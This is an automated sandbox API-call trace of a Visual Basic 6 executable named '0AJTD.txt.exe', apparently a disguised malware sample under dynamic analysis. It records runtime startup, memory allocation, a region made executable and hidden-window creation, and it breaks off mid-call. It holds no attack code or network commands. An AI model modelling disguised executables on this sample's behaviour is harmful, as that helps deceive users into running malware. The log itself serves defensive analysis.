# Flog Txt Version 1 # Analyzer Version: 3.2.1 # Analyzer Build Date: Jan 8 2020 21:00:13 # Log Creation Date: 13.01.2020 12:01:30.126 Process: id = "1" image_name = "0ajtd.txt.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0ajtd.txt.exe" page_root = "0x33259000" os_pid = "0x980" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x444" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xb44 [0091.678] GetVersion () returned 0x1db10106 [0091.683] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76e10000 [0091.684] GetProcAddress (hModule=0x76e10000, lpProcName="IsTNT") returned 0x0 [0091.685] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x230000 [0091.685] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x1b40000 [0091.686] VirtualAlloc (lpAddress=0x1b40000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x1b40000 [0091.689] GetCurrentThreadId () returned 0xb44 [0091.689] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe\" " [0091.689] GetEnvironmentStringsW () returned 0x2547c0* [0091.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0091.689] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x570) returned 0x2307d0 [0091.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2307d0, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0091.689] FreeEnvironmentStringsW (penv=0x2547c0) returned 1 [0091.689] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x480) returned 0x230d48 [0091.689] GetStartupInfoA (in: lpStartupInfo=0x18f9b8 | out: lpStartupInfo=0x18f9b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0091.690] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0091.690] GetFileType (hFile=0x0) returned 0x0 [0091.690] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0091.690] GetFileType (hFile=0x0) returned 0x0 [0091.690] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0091.690] GetFileType (hFile=0x0) returned 0x0 [0091.690] SetHandleCount (uNumber=0x20) returned 0x20 [0091.690] GetACP () returned 0x4e4 [0091.690] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9e0 | out: lpCPInfo=0x18f9e0) returned 1 [0091.690] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0ajtd.txt.exe")) returned 0x33 [0091.693] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x2307d0 | out: hHeap=0x230000) returned 1 [0091.693] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76e10000 [0091.693] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0091.693] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0091.694] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x800) returned 0x2311d0 [0091.695] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x7c [0091.695] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x80 [0091.696] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0091.696] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0091.696] GetVersion () returned 0x1db10106 [0091.696] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0091.701] GetUserDefaultLCID () returned 0x409 [0091.701] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0091.701] GetSystemMetrics (nIndex=5) returned 1 [0091.701] GetSystemMetrics (nIndex=6) returned 1 [0091.701] GetSystemMetrics (nIndex=11) returned 32 [0091.701] GetSystemMetrics (nIndex=12) returned 32 [0091.701] GetSystemMetrics (nIndex=34) returned 132 [0091.701] GetSystemMetrics (nIndex=35) returned 38 [0091.701] GetSystemMetrics (nIndex=0) returned 1440 [0091.701] GetSystemMetrics (nIndex=1) returned 900 [0091.701] GetSystemMetrics (nIndex=32) returned 8 [0091.701] GetSystemMetrics (nIndex=33) returned 8 [0091.701] GetSystemMetrics (nIndex=42) returned 0 [0091.702] GetStockObject (i=15) returned 0x188000b [0091.702] GetStockObject (i=7) returned 0x1b00017 [0091.702] GetStockObject (i=6) returned 0x1b00018 [0091.702] GetStockObject (i=8) returned 0x1b00016 [0091.702] GetStockObject (i=4) returned 0x1900011 [0091.702] GetStockObject (i=2) returned 0x1900012 [0091.702] GetStockObject (i=0) returned 0x1900010 [0091.702] GetStockObject (i=5) returned 0x1900015 [0091.702] GetStockObject (i=13) returned 0x18a002e [0091.702] GetDC (hWnd=0x0) returned 0x3010a0b [0091.703] GetTextExtentPointA (in: hdc=0x3010a0b, lpString="0", c=1, lpsz=0x18f9dc | out: lpsz=0x18f9dc) returned 1 [0091.708] GetDeviceCaps (hdc=0x3010a0b, index=14) returned 1 [0091.708] GetDeviceCaps (hdc=0x3010a0b, index=12) returned 32 [0091.708] GetDeviceCaps (hdc=0x3010a0b, index=88) returned 96 [0091.708] GetDeviceCaps (hdc=0x3010a0b, index=90) returned 96 [0091.708] GetDeviceCaps (hdc=0x3010a0b, index=38) returned 32409 [0091.708] ReleaseDC (hWnd=0x0, hDC=0x3010a0b) returned 1 [0091.708] HeapCreate (flOptions=0x0, dwInitialSize=0x0, dwMaximumSize=0x0) returned 0x2340000 [0091.709] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x764066bc) returned 0x0 [0091.709] GetCurrentThreadId () returned 0xb44 [0091.710] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0091.710] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x104) returned 0x23407d0 [0091.710] GetCurrentThreadId () returned 0xb44 [0091.710] GetCurrentThreadId () returned 0xb44 [0091.710] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xec8) returned 0x23408e0 [0091.717] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe\" " [0091.717] lstrlenA (lpString="") returned 0 [0091.717] lstrcpyA (in: lpString1=0x18feac, lpString2="" | out: lpString1="") returned="" [0091.717] SetErrorMode (uMode=0x8001) returned 0x0 [0091.717] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fb68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0091.717] GetUserDefaultLCID () returned 0x409 [0091.717] lstrcpyA (in: lpString1=0x18f868, lpString2="*" | out: lpString1="*") returned="*" [0091.717] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x18fc6c, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0091.718] GetSystemDefaultLCID () returned 0x409 [0091.718] GetUserDefaultLCID () returned 0x409 [0091.718] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x18fc76, cchData=2 | out: lpLCData=".") returned 2 [0091.718] GetStockObject (i=13) returned 0x18a002e [0091.718] GetObjectA (in: h=0x18a002e, c=60, pv=0x18fc3c | out: pv=0x18fc3c) returned 60 [0091.718] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0091.718] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0091.718] lstrlenA (lpString="{xx}") returned 4 [0091.718] lstrlenA (lpString="VB98.CHM") returned 8 [0091.718] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0091.719] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0091.719] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0091.719] lstrlenA (lpString="{xx}") returned 4 [0091.719] lstrlenA (lpString="VBENLR98.CHM") returned 12 [0091.719] lstrcpyA (in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0091.719] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fd90, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0ajtd.txt.exe")) returned 0x33 [0091.719] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fc8c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0091.719] lstrcpynA (in: lpString1=0x18fb70, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL", iMaxLength=260 | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0091.719] lstrlenA (lpString="C:\\Windows\\system32\\MSVBVM60.DLL") returned 32 [0091.719] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x21) returned 0x23417b0 [0091.719] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x0, Size=0x21) returned 0x23417e0 [0091.719] lstrcpyA (in: lpString1=0x23417b0, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL" | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0091.719] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe", cchSrc=-1, lpDestStr=0x18fb50, cchDest=260 | out: lpDestStr="C:\\USERS\\5P5NRGJN0JS HALPMCXZ\\DESKTOP\\0AJTD.TXT.EXE") returned 52 [0091.721] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18fc54, dwRevision=0x1 | out: pSecurityDescriptor=0x18fc54) returned 1 [0091.721] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18fc54, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18fc54) returned 1 [0091.721] CreateSemaphoreA (lpSemaphoreAttributes=0x18fc68, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?USERS?5P5NRGJN0JS HALPMCXZ?DESKTOP?0AJTD.TXT.EXE") returned 0x90 [0091.721] GetLastError () returned 0x0 [0091.722] GetVersionExA (in: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.722] OleInitialize (pvReserved=0x0) returned 0x0 [0092.981] OaBuildVersion () returned 0x321396 [0092.981] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x769d0000 [0092.981] GetLastError () returned 0x0 [0092.982] GetProcAddress (hModule=0x769d0000, lpProcName="OleLoadPictureEx") returned 0x76a370a1 [0092.982] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc16f [0092.982] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b9 [0092.982] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0092.983] RegisterClassA (lpWndClass=0x18fc34) returned 0xc16d [0092.983] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0092.983] RegisterClassA (lpWndClass=0x18fc34) returned 0xc059 [0092.983] HeapCreate (flOptions=0x0, dwInitialSize=0x400, dwMaximumSize=0x0) returned 0x2730000 [0092.984] GetUserDefaultLCID () returned 0x409 [0092.984] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x3a4) returned 0x2341810 [0092.985] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x3a4) returned 0x2341bc0 [0092.985] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0xd4) returned 0x2341f70 [0092.985] GetSystemInfo (in: lpSystemInfo=0x18fbf4 | out: lpSystemInfo=0x18fbf4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0092.985] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x3b0000 [0092.985] VirtualAlloc (lpAddress=0x3b0000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b0000 [0092.985] VirtualAlloc (lpAddress=0x3b0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b0000 [0092.986] VirtualAlloc (lpAddress=0x3b0000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b0000 [0092.986] VirtualAlloc (lpAddress=0x3b0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b0000 [0092.986] VirtualAlloc (lpAddress=0x3b0000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b0000 [0092.986] VirtualAlloc (lpAddress=0x3b0000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b0000 [0092.987] VirtualProtect (in: lpAddress=0x3b0000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x18fc50 | out: lpflOldProtect=0x18fc50*=0x4) returned 1 [0092.991] GetCurrentProcess () returned 0xffffffff [0092.991] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x3b0000, dwSize=0x6000) returned 1 [0092.992] GlobalAddAtomA (lpString="VBDisabled") returned 0xc166 [0092.992] GetVersion () returned 0x1db10106 [0092.992] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x769d0000 [0092.992] GetProcAddress (hModule=0x769d0000, lpProcName="DispCallFunc") returned 0x769e3dcf [0092.992] GetProcAddress (hModule=0x769d0000, lpProcName="LoadTypeLibEx") returned 0x769e07b7 [0092.992] GetProcAddress (hModule=0x769d0000, lpProcName="UnRegisterTypeLib") returned 0x76a01ca9 [0092.992] GetProcAddress (hModule=0x769d0000, lpProcName="CreateTypeLib2") returned 0x769e8e70 [0092.993] GetProcAddress (hModule=0x769d0000, lpProcName="VarDateFromUdate") returned 0x769e7684 [0092.993] GetProcAddress (hModule=0x769d0000, lpProcName="VarUdateFromDate") returned 0x769ecc98 [0092.993] GetProcAddress (hModule=0x769d0000, lpProcName="GetAltMonthNames") returned 0x76a1903a [0092.993] GetProcAddress (hModule=0x769d0000, lpProcName="VarNumFromParseNum") returned 0x769e6231 [0092.993] GetProcAddress (hModule=0x769d0000, lpProcName="VarParseNumFromStr") returned 0x769e5fea [0092.993] GetProcAddress (hModule=0x769d0000, lpProcName="VarDecFromR4") returned 0x769f3f94 [0092.993] GetProcAddress (hModule=0x769d0000, lpProcName="VarDecFromR8") returned 0x769f4e9e [0092.993] GetProcAddress (hModule=0x769d0000, lpProcName="VarDecFromDate") returned 0x76a1db72 [0092.993] GetProcAddress (hModule=0x769d0000, lpProcName="VarDecFromI4") returned 0x76a02a8c [0092.994] GetProcAddress (hModule=0x769d0000, lpProcName="VarDecFromCy") returned 0x76a1d737 [0092.994] GetProcAddress (hModule=0x769d0000, lpProcName="VarR4FromDec") returned 0x76a1e015 [0092.994] GetProcAddress (hModule=0x769d0000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x76a1cc3d [0092.994] GetProcAddress (hModule=0x769d0000, lpProcName="GetRecordInfoFromGuids") returned 0x76a1d1c4 [0092.994] GetProcAddress (hModule=0x769d0000, lpProcName="SafeArrayGetRecordInfo") returned 0x76a1d48c [0092.994] GetProcAddress (hModule=0x769d0000, lpProcName="SafeArraySetRecordInfo") returned 0x76a1d4c6 [0092.994] GetProcAddress (hModule=0x769d0000, lpProcName="SafeArrayGetIID") returned 0x76a1d509 [0092.994] GetProcAddress (hModule=0x769d0000, lpProcName="SafeArraySetIID") returned 0x769ee7bb [0092.994] GetProcAddress (hModule=0x769d0000, lpProcName="SafeArrayCopyData") returned 0x769ee496 [0092.995] GetProcAddress (hModule=0x769d0000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x769eddf1 [0092.995] GetProcAddress (hModule=0x769d0000, lpProcName="SafeArrayCreateEx") returned 0x76a1d53f [0092.995] GetProcAddress (hModule=0x769d0000, lpProcName="VarFormat") returned 0x76a22055 [0092.995] GetProcAddress (hModule=0x769d0000, lpProcName="VarFormatDateTime") returned 0x76a220ea [0092.995] GetProcAddress (hModule=0x769d0000, lpProcName="VarFormatNumber") returned 0x76a22151 [0092.995] GetProcAddress (hModule=0x769d0000, lpProcName="VarFormatPercent") returned 0x76a221f5 [0092.995] GetProcAddress (hModule=0x769d0000, lpProcName="VarFormatCurrency") returned 0x76a22288 [0092.995] GetProcAddress (hModule=0x769d0000, lpProcName="VarWeekdayName") returned 0x76a22335 [0092.995] GetProcAddress (hModule=0x769d0000, lpProcName="VarMonthName") returned 0x76a223d5 [0092.996] GetProcAddress (hModule=0x769d0000, lpProcName="VarAdd") returned 0x769f5934 [0092.996] GetProcAddress (hModule=0x769d0000, lpProcName="VarAnd") returned 0x769f5a98 [0092.996] GetProcAddress (hModule=0x769d0000, lpProcName="VarCat") returned 0x769f59b4 [0092.996] GetProcAddress (hModule=0x769d0000, lpProcName="VarDiv") returned 0x76a4e405 [0092.996] GetProcAddress (hModule=0x769d0000, lpProcName="VarEqv") returned 0x76a4ef07 [0092.996] GetProcAddress (hModule=0x769d0000, lpProcName="VarIdiv") returned 0x76a4f00a [0092.996] GetProcAddress (hModule=0x769d0000, lpProcName="VarImp") returned 0x76a4ef47 [0092.996] GetProcAddress (hModule=0x769d0000, lpProcName="VarMod") returned 0x76a4f15e [0092.996] GetProcAddress (hModule=0x769d0000, lpProcName="VarMul") returned 0x76a4dbd4 [0092.997] GetProcAddress (hModule=0x769d0000, lpProcName="VarOr") returned 0x76a4ecfa [0092.997] GetProcAddress (hModule=0x769d0000, lpProcName="VarPow") returned 0x76a4ea66 [0092.997] GetProcAddress (hModule=0x769d0000, lpProcName="VarSub") returned 0x76a4d332 [0092.997] GetProcAddress (hModule=0x769d0000, lpProcName="VarXor") returned 0x76a4ee2e [0092.997] GetProcAddress (hModule=0x769d0000, lpProcName="VarAbs") returned 0x76a4ca11 [0092.997] GetProcAddress (hModule=0x769d0000, lpProcName="VarFix") returned 0x76a4cc5f [0092.997] GetProcAddress (hModule=0x769d0000, lpProcName="VarInt") returned 0x76a4cde7 [0092.997] GetProcAddress (hModule=0x769d0000, lpProcName="VarNeg") returned 0x76a4c802 [0092.998] GetProcAddress (hModule=0x769d0000, lpProcName="VarNot") returned 0x76a4ec66 [0092.998] GetProcAddress (hModule=0x769d0000, lpProcName="VarRound") returned 0x76a4d155 [0092.998] GetProcAddress (hModule=0x769d0000, lpProcName="VarCmp") returned 0x769eb0dc [0092.998] GetProcAddress (hModule=0x769d0000, lpProcName="VarDecAdd") returned 0x76a05f3e [0092.998] GetProcAddress (hModule=0x769d0000, lpProcName="VarDecCmp") returned 0x769f4fd0 [0092.998] GetProcAddress (hModule=0x769d0000, lpProcName="VarBstrCat") returned 0x769f0d2c [0092.998] GetProcAddress (hModule=0x769d0000, lpProcName="VarCyMulI4") returned 0x76a059ed [0092.998] GetProcAddress (hModule=0x769d0000, lpProcName="VarBstrCmp") returned 0x769df8b8 [0092.998] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x762c0000 [0092.999] GetProcAddress (hModule=0x762c0000, lpProcName="CoCreateInstanceEx") returned 0x76309d4e [0092.999] GetProcAddress (hModule=0x762c0000, lpProcName="CLSIDFromProgIDEx") returned 0x762d0782 [0092.999] GetSystemMetrics (nIndex=42) returned 0 [0092.999] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x764066bc) returned 0x0 [0092.999] IMalloc:Alloc (This=0x764066bc, cb=0x4) returned 0x258cb0 [0092.999] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f968, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0ajtd.txt.exe")) returned 0x33 [0093.005] lstrcatA (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe", lpString2=".cfg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe.cfg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe.cfg" [0093.005] SetLastError (dwErrCode=0x0) [0093.005] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x18f864, lpFilePart=0x18f838 | out: lpBuffer="|ú\x18", lpFilePart=0x18f838) returned 0x0 [0093.006] SetLastError (dwErrCode=0x2) [0093.006] GetLastError () returned 0x2 [0093.006] lstrcmpiA (lpString1="0AJTD.txt", lpString2="MTX") returned -1 [0093.006] lstrcmpiA (lpString1="0AJTD.txt", lpString2="DLLHOST") returned -1 [0093.006] lstrcmpiA (lpString1="0AJTD.txt", lpString2="INETINFO") returned -1 [0093.006] lstrcmpiA (lpString1="0AJTD.txt", lpString2="W3WP") returned -1 [0093.006] lstrcmpiA (lpString1="0AJTD.txt", lpString2="ASPNET_WP") returned -1 [0093.006] lstrcmpiA (lpString1="0AJTD.txt", lpString2="DLLHST3G") returned -1 [0093.006] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f95c, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AJTD.txt.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0ajtd.txt.exe")) returned 0x33 [0093.006] lstrcmpiA (lpString1="0AJTD.txt", lpString2="IEXPLORE") returned -1 [0093.006] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x74530000 [0093.333] GetLastError () returned 0x0 [0093.333] GetProcAddress (hModule=0x74530000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x74577685 [0093.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18feac, cbMultiByte=-1, lpWideCharStr=0x18fea8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0093.333] RtlAllocateHeap (HeapHandle=0x2340000, Flags=0x8, Size=0x1c) returned 0x2342050 [0093.333] CoRegisterMessageFilter (in: lpMessageFilter=0x2342054, lplpMessageFilter=0x234205c | out: lplpMessageFilter=0x234205c*=0x0) returned 0x0 [0093.333] IUnknown:AddRef (This=0x2342054) returned 0x2 [0093.334] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x18fe78 | out: lpwcx=0x18fe78) returned 0 [0093.334] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0x2025f [0093.335] GetModuleHandleA (lpModuleName="USER32") returned 0x76780000 [0093.335] GetProcAddress (hModule=0x76780000, lpProcName="GetSystemMetrics") returned 0x76797d2f [0093.335] GetProcAddress (hModule=0x76780000, lpProcName="MonitorFromWindow") returned 0x767a3150 [0093.336] GetProcAddress (hModule=0x76780000, lpProcName="MonitorFromRect") returned 0x767be7a0 [0093.336] GetProcAddress (hModule=0x76780000, lpProcName="MonitorFromPoint") returned 0x767a5281 [0093.336] GetProcAddress (hModule=0x76780000, lpProcName="EnumDisplayMonitors") returned 0x767a451a [0093.336] GetProcAddress (hModule=0x76780000, lpProcName="GetMonitorInfoA") returned 0x767a4413 [0093.336] GetSystemMetrics (nIndex=0) returned 1440 [0093.336] GetSystemMetrics (nIndex=78) returned 1440 [0093.336] GetSystemMetrics (nIndex=1) returned 900 [0093.336] GetSystemMetrics (nIndex=79) returned 900 [0093.336] GetSystemMetrics (nIndex=50) returned 16 [0093.336] GetSystemMetrics (nIndex=49) returned 16 [0093.336] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x20257 [0093.337] RegisterClassExA (param_1=0x18fe78) returned 0x8ec167 [0093.337] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x50134 [0093.338] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x81, wParam=0x0, lParam=0x18fa5c) returned 0x1 [0093.340] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x83, wParam=0x0, lParam=0x18fa48) returned 0x0 [0093.340] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x1, wParam=0x0, lParam=0x18fa5c) returned 0x0 [0093.340] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0093.340] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0093.340] MonitorFromWindow (hwnd=0x50134, dwFlags=0x2) returned 0x10001 [0093.340] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x18fe80 | out: lpmi=0x18fe80) returned 1 [0093.340] SetWindowPos (hWnd=0x50134, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0093.340] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x46, wParam=0x0, lParam=0x18fe20) returned 0x0 [0093.342] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x47, wParam=0x0, lParam=0x18fe20) returned 0x0 [0093.343] NtdllDefWindowProc_A (hWnd=0x50134, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0093.343] ShowWindow (hWnd=0x50134, nCmdShow=4) returned 0 [0093.343] NtdllDefWindowProc_A (hWnd=0x50134, 